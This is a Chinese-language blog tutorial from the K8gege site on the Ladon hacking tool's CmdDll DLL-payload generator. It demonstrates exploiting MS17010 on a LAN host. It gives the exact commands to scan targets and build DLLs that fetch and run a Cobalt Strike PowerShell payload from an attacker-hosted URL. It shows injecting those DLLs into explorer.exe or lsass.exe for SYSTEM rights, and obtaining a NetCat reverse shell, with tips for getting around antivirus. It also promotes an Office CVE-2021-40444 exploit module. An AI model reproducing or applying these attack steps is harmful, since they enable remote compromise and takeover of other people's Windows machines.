logo

K8哥哥

没有绝对安全的系统

〖教程〗Ladon 0day通用DLL生成器-MS17010演示

Ladon 2021/09/20

本文于 839 天之前发表

=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Ladon8.9更新功能

20210920
[+]CmdDll Windows 0day漏洞通用DLL注入生成器,生成的DLL仅5KB,非常适合0day加载

2021.9.15
[u]webscan CS保留
[u]CmdDll 去除黑框

2021.9.14
[+]CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞,Office文档利用模块
影响版本: 包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
[+]CmdDll cmd转DLL(Win系统0day漏洞DLL执行命令payload,可直接powershell上线CobaltStrike)
溢出漏洞如MS17010、本地提权CVE-2021-1675等,非溢出如最新的Office漏洞CVE-2021-40444等

CMD用法

1
2
3
4
5
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

PS:由于生成的DLL仅5KB,所以可执行的payload的最大长度是2000字节,基本上够用了,可执行NC反弹,CS上线,或各类powershell框架远程加载执行。

DLL测试

1
2
3
Usage:
Rundll32 sc32.dll,k8
Rundll32 sc64.dll,k8

复现0day前,测试是必须的,先保证DLL功能正常,才能拿去复现漏洞,不然你不知道是漏洞的DLL注入或DLL加载器没调好,还是DLL本身有问题,DLL启动参数是任意的,意味着不管漏洞注入导出函数是什么,都能加载,所以我们可用于多个已知漏洞或以后新出的0day漏洞测试。

GUI用法

由于生成DLL都是本地生成,使用CMD版比较麻烦,所以该功能添加到GUI中。用法打开LadonGUI–CmdDll模块,上文本框填写需要执行的CMD命令,CMD执行有两种方式,一是默认的CMD执行,二是PowerShell Base64加密执行,(勾选Base64Cmd),根据需要点击对应系统位数生成DLL。

弹计算器演示

为了方便,可以通过GUI上的TEST按钮测试DLL功能

MS17010漏洞CS上线演示

1 通过命令 Ladon 192.168.1.8/24 MS17010 扫描发现192.168.1.106主机存在MS17010漏洞
2 配置好CS监听器,使用“Web Delivery”生成powershell的URL监听
3 LadonGUI-CmdDLL-CS文本框填写URL,如http://192.168.1.108/a,生成x86的DLL(目标32位系统)
4 使用命令 Ksmb.exe 192.168.1.106 445 sc32.dll explorer.exe,远程溢出106主机并将dll注入explorer.exe,注入explorer进程得到的是当前用户权限,如果注入lsass.exe得到的是system权限,其它进程也是同理,看进程启动所使用的权限,实际测试请根据需要,如遇到不出网的情况,需添加用户注入explorer可能就会失败,因为有些机器开启UAC。

MS17010漏洞NC反弹演示

可能有些机器存在杀软查杀CS,导致无法直接上线CS,这时我们可使用NC或MSF上线

1 通过命令 Ladon 192.168.1.8/24 MS17010 扫描发现192.168.1.106主机存在MS17010漏洞
2 打开LadonGui-NetCat-启动监听,默认监听本机4444端口,使用 Ladon web 800 启动WEB,在GUI里填写对应PS1的下载地址,如http://192.168.1.108:800/Ladon.ps1,实战若是需要远程内存加载其它powershell框架,下载exe、dll等文件均可使用Ladon的web模块监听
3 LadonGUI-CmdDLL-填写IP和端口,生成NC x86的DLL(目标32位系统)
4 使用命令 Ksmb.exe 192.168.1.106 445 sc32.dll explorer.exe,远程溢出106主机,成功反弹shell

#### CVE-2021-40444 Office漏洞复现CS上线

http://k8gege.org/Ladon/CVE-2021-40444.html

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.9版本:K8小密圈

扫码加入K8小密圈

转载声明: 商业转载请联系作者获得授权,非商业转载请注明出处 © K8gege
Total:
Copyright © 2020 | Powered by K8gege